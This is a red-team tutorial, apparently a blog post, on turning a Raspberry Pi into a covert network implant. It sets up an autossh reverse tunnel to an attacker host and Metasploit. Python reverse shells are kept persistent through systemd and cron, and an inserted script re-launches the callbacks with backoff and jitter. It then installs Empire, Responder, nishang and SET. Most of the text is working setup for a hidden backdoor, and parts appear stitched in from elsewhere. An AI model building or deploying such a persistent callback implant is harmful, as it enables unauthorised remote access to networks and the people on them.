I'm leaving this here for a bit as I have not finished my other post, but there is a much better way to do this which I use in red teams.
I have created a script to automate all of this, so this writeup is obsolete.
First download and install Raspbian onto an SD card; there are loads of guides on how to do this.
I chose the Lite version, which is perfect for making something speedy, and I did not want it bloated with a lot of GUI stuff I did not need.
Win32 Disk Imager is my preference as it writes the entire SD card in one hit. Other Linux methods (dd and friends) work just as well.
Insert the card, boot the Pi and log in with the default credentials pi:raspberry.
Change the default password to something strong straight away; anyone on the network can guess pi:raspberry.
sudo su (Become root)
passwd pi #set a strong password
passwd root #set a strong password
Now make sure you have SSH listening on your "attacker machine" (the box the Pi will call home to):
apt-get install openssh-server
service ssh start
Back on the Pi, regenerate the SSH host keys so they are unique to this build rather than whatever the image or a previous boot left behind:
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
Now enable the SSH server on the Pi so it is listening every time it boots. Note the Pi's current IP first:
ifconfig #to get your current IP
raspi-config
Select "5 Interfacing Options", then "SSH", and enable it.
Reboot the Pi and try to log in over SSH with that IP.
Now that is working you need to configure autossh. On the Pi:
sudo su (Become root)
apt-get install autossh
useradd -m -s /usr/sbin/nologin piusername #dedicated tunnel user with no interactive shell
su - piusername -s /bin/bash
ssh-keygen
(Don't set a passphrase; the tunnel has to come up unattended at boot, so nobody is there to type it)
Now you need to create a user on your attacker machine for the Pi to connect to:
useradd -m -s /bin/bash localusername
passwd localusername #set a very secure password, as this account will be exposed to wherever the Pi calls home from
Ensure you can log in to it via SSH on localhost. Once the Pi's key is installed (next step) the password is no longer needed, and you can turn password logins off for this account with a Match User localusername / PasswordAuthentication no block in sshd_config.
Once that is verified, move to the next step.
You need to copy the Pi tunnel user's public key (~/.ssh/id_rsa.pub by default) over to the attacker machine, into the authorized_keys file of the account the Pi will log in as.
The ideal way to do this is to add it manually (copy and paste via ssh), although ssh-copy-id does the same job:
ssh-copy-id -i ~/.ssh/id_rsa.pub localusername@<attacker-ip>
Seeing as I was logged in via ssh, I copied and pasted my ID into a newly created authorized_keys file in /root/.ssh/.
Make sure the permissions are all good; sshd silently ignores authorized_keys if the file or its directory is group or world writable:
chmod 700 /root/.ssh
chmod 600 /root/.ssh/*
If the key lives under root as above, root login over SSH also has to be permitted (if you put it in /home/localusername/.ssh/authorized_keys instead, this step is unnecessary, and that is the safer choice). Only the key is needed, so prohibit-password, which allows key logins but no password logins for root, is preferable to yes. Check there is no earlier uncommented PermitRootLogin line first, because sshd honours the first occurrence, then restart sshd:
echo "PermitRootLogin prohibit-password" >> /etc/ssh/sshd_config
service ssh restart
There are several ways to create a startup file, but I prefer to create a new systemd service as this has proven the most reliable.
Steps to do that are as follows:
Create the following file as /etc/systemd/system/autossh.service (it runs autossh as piusername with a -R 2222:localhost:22 reverse forward back to the attacker machine):
Now run the following commands
systemctl start autossh.service
systemctl status autossh.service
If status reports active (running) and no repeated restarts, you are good to go to the next step.
Now enter the following command on your attacker machine. The forwarded port is bound on the attacker machine's loopback, so you connect to localhost:2222 and land on the Pi's sshd as any Pi account with a shell (pi or root, not piusername):
ssh pi@localhost -p 2222
If you can log in then you are good to go. The Pi will create the reverse tunnel whenever autossh.service is started.
The last command you need to run to enable autossh on boot is:
systemctl enable autossh.service
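The unit file itself is not reproduced in the steps above, so here is an added example (my own script, not the post's file) that generates a hardened autossh unit, writes it into /etc/systemd/system, and prints the restricted authorized_keys line to paste on the attacker box so the Pi's key can do nothing but open the tunnel. The user names piusername and localusername, the documentation address 203.0.113.10, port 2222 and the ed25519 key path are assumptions; change them to match your setup.

```shell
#!/bin/sh
# Added example: generate a hardened autossh unit and the matching key
# restriction for the attacker side. All names below are assumptions.

# Print a systemd unit that keeps attacker:2222 -> pi:22 up as the tunnel
# user. -M 0 drops autossh's own monitor port; ServerAlive* lets ssh detect
# a dead link itself; ExitOnForwardFailure makes ssh exit (so it gets
# restarted) if 2222 is still held by a stale session on the attacker box;
# AUTOSSH_GATETIME=0 stops autossh giving up on early failures at boot.
autossh_unit() {
    pi_user="$1"; remote_user="$2"; remote_host="$3"; remote_port="$4"
    cat <<EOF
[Unit]
Description=Reverse SSH tunnel to ${remote_host}
After=network-online.target
Wants=network-online.target

[Service]
User=${pi_user}
Environment=AUTOSSH_GATETIME=0
ExecStart=/usr/bin/autossh -M 0 -N -q \\
    -o ServerAliveInterval=30 -o ServerAliveCountMax=3 \\
    -o ExitOnForwardFailure=yes \\
    -o StrictHostKeyChecking=yes \\
    -i /home/${pi_user}/.ssh/id_ed25519 \\
    -R ${remote_port}:localhost:22 ${remote_user}@${remote_host}
Restart=always
RestartSec=15

[Install]
WantedBy=multi-user.target
EOF
}

# authorized_keys line for the attacker box: the Pi's key may only open the
# tunnel. 'restrict' (OpenSSH 7.2+) disables pty, agent/X11 forwarding and
# port forwarding; 'port-forwarding' re-enables forwarding and 'permitlisten'
# (OpenSSH 7.8+) pins the one remote port it is allowed to bind.
tunnel_key_line() {
    remote_port="$1"; pubkey="$2"
    printf 'restrict,port-forwarding,permitlisten="%s" %s\n' "$remote_port" "$pubkey"
}

# Write the unit under $DESTDIR/etc/systemd/system and print its path
# (DESTDIR is empty on the real Pi; point it at a scratch dir to dry-run).
install_unit() {
    dir="${DESTDIR:-}/etc/systemd/system"
    mkdir -p "$dir"
    autossh_unit "$@" > "$dir/autossh.service"
    chmod 644 "$dir/autossh.service"
    echo "$dir/autossh.service"
}

# Only acts when invoked as "sh autossh-setup.sh install" (as root on the Pi).
if [ "${1:-}" = install ]; then
    # Passphrase-less key so the tunnel can come up unattended at boot.
    su - piusername -s /bin/sh -c \
        "mkdir -p ~/.ssh && ssh-keygen -t ed25519 -N '' -f ~/.ssh/id_ed25519"
    echo "Add this line to localusername's authorized_keys on the attacker box:"
    tunnel_key_line 2222 "$(cat /home/piusername/.ssh/id_ed25519.pub)"
    install_unit piusername localusername 203.0.113.10 2222
    systemctl daemon-reload
    systemctl enable autossh.service
fi
```

Because the unit keeps StrictHostKeyChecking=yes, connect once by hand as piusername (or ssh-keyscan the attacker host into /home/piusername/.ssh/known_hosts) before starting the service, otherwise ssh refuses the unknown host key and autossh loops. On an attacker box with OpenSSH older than 7.8, replace the permitlisten line with the classic no-pty,no-agent-forwarding,no-X11-forwarding,command="/bin/false" options; the forced command never runs because the client uses -N, so the forwards stay up.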
Providing all the above worked without errors (there may be some depending on your configuration), reboot the Pi and wait until you can SSH into it through the tunnel again:
ssh pi@localhost -p 2222
Once that is up and running you can start installing your tools. Most of these are easy and work out of the box; some are more difficult, and I have detailed them below.
If you want a list of the basic tools I installed, they are below:
apt-get install nmap wifite cutycapt screen locate
Metasploit was a bit of a nightmare, as it will not work out of the box on this old Raspberry Pi; if it does not work for you, be prepared to google your errors.
You need to install a load of tools and dependencies to get this up and running, so I am already missing Kali, but I will press ahead and get it working as I want this on the machine.
I managed to strip it down to the following:
git clone https://github.com/rapid7/metasploit-framework.git /opt/metasploit-framework #the aliases further down expect it in /opt
Now install the build dependencies (most of these will already be installed). ruby-dev is needed to compile the native gems; note that the Debian package called gem is unrelated to RubyGems, which ships with ruby:
apt-get -y install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev ruby ruby-dev bundler nmap
Before you can move on and install Metasploit you need a few other bits; the following worked for me (you may need to tweak it):
apt-get install libsqlite3-dev
# if that does not work
gem install sqlite3 -v '1.3.13'
The next command takes ages and appears to do nothing (it warns you), but give it time:
gem install nokogiri -v '1.8.2'
After about 9 months you should see it finish.
Once they are installed we can "try" pulling in the rest of the framework's gems:
cd /opt/metasploit-framework
bundle install
You will get a warning about running bundler as root and a recommendation to install bundler via gem, but I carried on regardless as this is just a test.
At this point the Pi became unresponsive, so it's a good time to test out the autossh viability.
I pulled the power cable to give it a hard reset, plugged it back in, and within 40 seconds I had an SSH connection.
Considering the last response from bundler I decided to update it:
gem install bundler
This took a while on a fresh boot, but we are nearly there.
Now it is actually working.
This installed and seemed to work, so let's see how the Raspberry Pi handles msfconsole.
Wow, it was faster than I thought and took about 45 seconds.
Let's test it out with a reverse shell; it looks like it is working so far.
Create one with msfvenom on your attacker machine.
Set up a listener.
Execute the shell.
Watch your listener for a shell.
It looks like the latest exploits are installed as well, so we can move on to the next tool.
Modify .bashrc with the following command to make it run from any directory, or add it to your bin.
(FYI I tweaked my .bashrc at this point to make my console stand out.)
echo "alias msfconsole='/opt/metasploit-framework/msfconsole'" >> ~/.bashrc
Test it works (source ~/.bashrc or open a new shell first, since aliases are only read at login).
Also add msfvenom to your .bashrc for easy shells:
echo "alias msfvenom='/opt/metasploit-framework/msfvenom'" >> ~/.bashrc
Creating other methods of access.
Now we want to add a few other shells in case we are unable to get autossh out through the firewall, to make sure you can still access the machine.
We will use python, as the ARM architecture does not play well with msfvenom.
Reverse HTTPS python shell (port 80):
Reverse HTTPS python shell:
Reverse HTTPS python shell via port 53:
Now create the following file on your attacker machine called meterpreter.rc, with one handler per callback.
Run the .rc file with the following command:
msfconsole -q -r meterpreter.rc
Check your shells work.
These are pretty handy if you have some local tools you want to run against the host or if you want to pivot with Metasploit.
Now create three services in /etc/systemd/system, one per callback, with the following contents.
Start each of the services to make sure they work.
Enable your services to start at boot.
Exit meterpreter and start your handlers from scratch:
msfconsole -q -r meterpreter.rc
Reboot the Pi and you should see three shells come back.
Now we have four ways for our Pi to call back to us (the autossh tunnel plus the three python shells).
Another method which may be easier is to create a cronjob.
Create the following file, Shells.sh, which launches each of the python callbacks.
Make the file executable:
chmod +x Shells.sh
Open root's crontab with:
crontab -e
Add the following entry:
@reboot /bin/bash /root/Shells.sh
Save, exit and reboot the Pi.
Open your listener again and after a while you should see your shells come back.
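The post's Shells.sh is not reproduced, and a script that simply launches the three payloads once gives you exactly one chance per reboot: if the handler is down or the session drops, that callback is gone until the next power cycle. The following is an added example (my own script, not the post's file) that serves both the cron approach and the systemd-service approach above: it supervises each callback, reconnects with an exponential backoff and a little jitter, and resets the backoff after a session that held. The payload file names under /root/shells and the python2 interpreter are assumptions standing in for the msfvenom python output.

```shell
#!/bin/sh
# Added example (not the post's Shells.sh): supervise the three python
# callbacks so a dropped session is re-established with a backoff rather
# than launched once at boot. Paths and file names below are assumptions.

SHELL_DIR="${SHELL_DIR:-/root/shells}"
PAYLOADS="rev80.py rev443.py rev53.py"

# Base delay before reconnect attempt $1: 15 s, doubling per attempt,
# capped at 600 s so a dead handler is retried every ten minutes at most.
backoff_base() {
    attempt="$1"; base=15; i=1
    while [ "$i" -lt "$attempt" ] && [ "$base" -lt 600 ]; do
        base=$((base * 2)); i=$((i + 1))
    done
    if [ "$base" -gt 600 ]; then base=600; fi
    echo "$base"
}

# 0-30 s of random jitter so the three loops do not all reconnect to the
# handler in lock-step after every drop.
jitter() {
    echo $(( $(od -An -N2 -tu2 /dev/urandom) % 31 ))
}

# Run one payload forever. The interpreter blocks while the session is
# alive; when it returns, the session is gone, so wait and retry. A session
# that held for more than a minute resets the backoff to its first step.
supervise() {
    payload="$1"; attempt=1
    while :; do
        start=$(date +%s)
        python2 "$SHELL_DIR/$payload"
        if [ $(( $(date +%s) - start )) -gt 60 ]; then attempt=1; fi
        sleep $(( $(backoff_base "$attempt") + $(jitter) ))
        attempt=$((attempt + 1))
    done
}

# Only acts when run as "/bin/sh /root/Shells.sh run" (e.g. from @reboot).
if [ "${1:-}" = run ]; then
    sleep 30                      # give the network time to come up first
    for p in $PAYLOADS; do
        supervise "$p" &
    done
    wait                          # keep the parent alive for cron/systemd
fi
```

With this version the cron entry becomes @reboot /bin/sh /root/Shells.sh run; if you prefer the systemd route, one service with ExecStart=/bin/sh /root/Shells.sh run and Restart=always replaces the three separate units, because the script already restarts each callback itself.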
git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database
Not sure why you would not have this on your local machine, but it always helps.
Make searchsploit executable and test it.
It works, so add it to your .bashrc file.
Be careful not to overwrite it (append with >>, not >):
echo "alias searchsploit='/opt/exploit-database/searchsploit'" >> ~/.bashrc
Type the following:
Check it works outside of the exploit-database folder.
Raspbian comes with python installed.
First we will install pip (easy python installs):
apt-get install python-pip
You can add your tools via pip as you need them, but just for a demo (this was already installed):
python -m SimpleHTTPServer 81
Let's see what we can host internally.
OK, happy with that; not my best fake website, but you get the idea.
git clone https://github.com/samratashok/nishang.git
Best PowerShell reverse shell I have found so far, which you can host via python.
This combined with a Bash Bunny is really handy.
Another amazing PowerShell tool you want on this machine:
git clone https://github.com/trustedsec/unicorn.git
git clone https://github.com/SpiderLabs/Responder.git
Very good tool.
Another tool to add which will be useful for internal tests:
git clone https://github.com/adaptivethreat/Empire.git
apt-get install python-m2crypto
pip install pyminifier
Once installed you should see the Empire setup complete.
Social Engineer Toolkit
Another great tool; most of the dependencies are already installed.
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit
python setup.py install
Setup should end without errors.
Now SET is installed.